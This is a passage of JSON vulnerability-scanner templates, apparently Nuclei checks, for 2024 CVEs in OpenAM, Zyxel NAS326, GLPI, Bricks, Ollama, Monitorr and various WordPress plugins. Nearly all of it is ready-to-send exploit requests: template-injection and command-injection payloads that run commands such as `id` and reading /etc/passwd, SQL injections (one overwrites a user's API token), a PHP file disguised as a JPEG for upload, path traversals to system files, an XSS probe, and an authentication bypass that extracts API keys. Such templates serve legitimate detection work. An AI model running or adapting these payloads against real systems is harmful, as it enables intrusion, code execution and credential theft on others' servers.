keep-alive\n\njato.defaultCommand=%2Fg&jato.pageSession={{pageSession2}}\n"],"extractors":[{"type":"regex","name":"pageSession3","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\n&Agents.tfFilter=*&Agents.tblSearch.PrimarySortNameHiddenField=tblDataName&Agents.tblSearch.PrimarySortOrderHiddenField=ascending&Agents.tblSearch.SecondarySortNameHiddenField=&Agents.tblSearch.SecondarySortOrderHiddenField=&Agents.tblSearch.AdvancedSortNameHiddenField=&Agents.tblSearch.AdvancedSortOrderHiddenField=&Agents.tblButtonAdd=New...&Agents.tblButtonDelete.DisabledHiddenField=true&Agents.tblSearch.SelectionCheckbox0.jato_boolean=false&Agents.tblDataUniversalName=id%3Dou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&Agents.tfGroupFilter=*&Agents.tblSearchGroup.PrimarySortNameHiddenField=tblDataGroupName&Agents.tblSearchGroup.PrimarySortOrderHiddenField=ascending&Agents.tblSearchGroup.SecondarySortNameHiddenField=&Agents.tblSearchGroup.SecondarySortOrderHiddenField=&Agents.tblSearchGroup.AdvancedSortNameHiddenField=&Agents.tblSearchGroup.AdvancedSortOrderHiddenField=&Agents.tblButtonGroupDelete.DisabledHiddenField=true&jato.defaultCommand=%2FbtnSearch&jato.pageSession={{pageSession3}}\n"],"extractors":[{"type":"regex","name":"pageSession4","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/AgentAdd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nAgentAdd.button1=Create&AgentAdd.tfName={{randstr}}&AgentAdd.tfPassword=test&AgentAdd.tfPasswordConfirm=test&jato.defaultCommand=%2Fbutton1&jato.pageSession={{pageSession4}}\n"],"extractors":[{"type":"regex","name":"pageSession5","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tblDataActionHref=id%3D{{randstr}}%2Cou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&jato.pageSession={{pageSession2}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession6","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/GenericAgentProfile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nGenericAgentProfile.button1=+Save+&GenericAgentProfile.agentgroup=&GenericAgentProfile.sunIdentityServerDeviceStatus=Active&GenericAgentProfile.userpassword=&GenericAgentProfile.userpassword_confirm=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientType=Confidential&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.listbox=https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.selectedTextField=https%3A%2F%2Fgithub.com%09https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.listbox=employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=employeenumber%09employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.selectedTextField=code%09code%09token%09token%09id_token%09id_token%09code+token%09code+token%09token+id_token%09token+id_token%09code+id_token%09code+id_token%09code+token+id_token%09code+token+id_token&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.tokenEndPointAuthMethod=client_secret_basic&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwksURI=http%3A%2F%2Fkubernetes.docker.internal%3A8081%2Fopenam%2Foauth2%2Fconnect%2Fjwk_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwks=&GenericAgentProfile.com.forgerock.openam.oauth2provider.sectorIdentifierURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.subjectType=Public&GenericAgentProfile.com.forgerock.openam.oauth2provider.idTokenSignedResponseAlg=HS256&GenericAgentProfile.idTokenEncryptionEnabled.jato_boolean=false&GenericAgentProfile.idTokenEncryptionAlgorithm=RSA1_5&GenericAgentProfile.idTokenEncryptionMethod=A128CBC-HS256&GenericAgentProfile.idTokenPublicEncryptionKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessToken=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientSessionURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientJwtPublicKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAge=600&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAgeEnabled.jato_boolean=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.publicKeyLocation=jwks_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.authorizationCodeLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.refreshTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwtTokenLifeTime=0&GenericAgentProfile.isConsentImplied.jato_boolean=false&jato.pageSession={{pageSession6}}\n"],"matchers":[{"type":"word","part":"body","words":["<div class=\"AlrtMsgTxt\">Profile was updated.</div>"]}]},{"raw":["POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\nConnection: keep-alive\n\n{}\n"],"matchers":[{"type":"word","part":"body","words":["message","reason","code"],"condition":"and"}]},{"raw":["PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\n\n{\"advancedOAuth2Config\":{\"customLoginUrlTemplate\":\"<#assign value=\\\"freemarker.template.utility.Execute\\\"?new()>${value(\\\"head -n 1 /etc/passwd\\\")}\"},\"deviceCodeConfig\":{\"completionUrl\":\"\",\"verificationUrl\":\"\",\"devicePollInterval\":5,\"deviceCodeLifetime\":300},\"oidcSsoProviderEnabled\":false,\"_id\":\"\",\"_type\":{\"_id\":\"oauth-oidc\",\"name\":\"OAuth2 Provider\",\"collection\":false}}\n"],"matchers":[{"type":"word","part":"body","words":["advancedOAuth2Config","customLoginUrlTemplate"],"condition":"and"}]},{"raw":["GET /openam/oauth2/realms/root/authorize?client_id={{randstr}}&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf={{csrf}}&max_age=200 HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"matchers":[{"type":"dsl","dsl":["contains(urldecode(location),\"root:x:0:0:\")"]}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29889","info":{"name":"GLPI 10.0.10-10.0.14 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /index.php?noAUTO=1 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"fieldlogin","part":"body","group":1,"regex":["id=\"login_name\" name=\"([a-z0-9]+)"],"internal":true},{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)"],"internal":true},{"type":"regex","name":"fieldpassword","part":"body","group":1,"regex":["id=\"login_password\" name=\"([0-9a-z]+)"],"internal":true}]},{"raw":["POST /front/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnoAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(location,'front/central.php')"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"id","part":"body","group":1,"regex":["type='hidden' name='id' value='([0-9]+)'"],"internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /front/preference.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"savedsearches_pinned\"\n\n{\"exploit\":\"',api_token='{{randstr}}' where id={{id}};-- -\"}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\n\n{{csrf2}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"name\"\n\nglpi\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"id\"\n\n{{id}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"realname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_uploader_picture[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_blank_picture\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"firstname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"language\"\n\nen_US\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_useremails[-1]\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"mobile\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"registration_number\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"locations_id\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"use_mode\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_reset_api_token\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"update\"\n\nSave\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf3","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /ajax/pin_savedsearches.php HTTP/1.1\nHost: {{Hostname}}\nX-Glpi-Csrf-Token: {{csrf3}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nitemtype=Monitor\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"\\\"success\\\":true\")"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"name=\\\"_api_token\\\" value=\\\"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6845","info":{"name":"SmartSearchWP < 2.4.6 - OpenAI Key Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/smartsearchwp\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/wdgpt/v1/api-key HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"key\": \"U2FsdGVkX1+X\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"api-key","regex":["\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6517","info":{"name":"Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/ds-cf7-math-captcha\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dscf7_refreshcaptcha&tagname=\"<script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"postId\": \"1\",\n \"nonce\": \"{{nonce}}\",\n \"element\": {\n \"name\": \"container\",\n \"settings\": {\n \"hasLoop\": \"true\",\n \"query\": {\n \"useQueryEditor\": true,\n \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n \"objectType\": \"post\"\n }\n }\n }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET 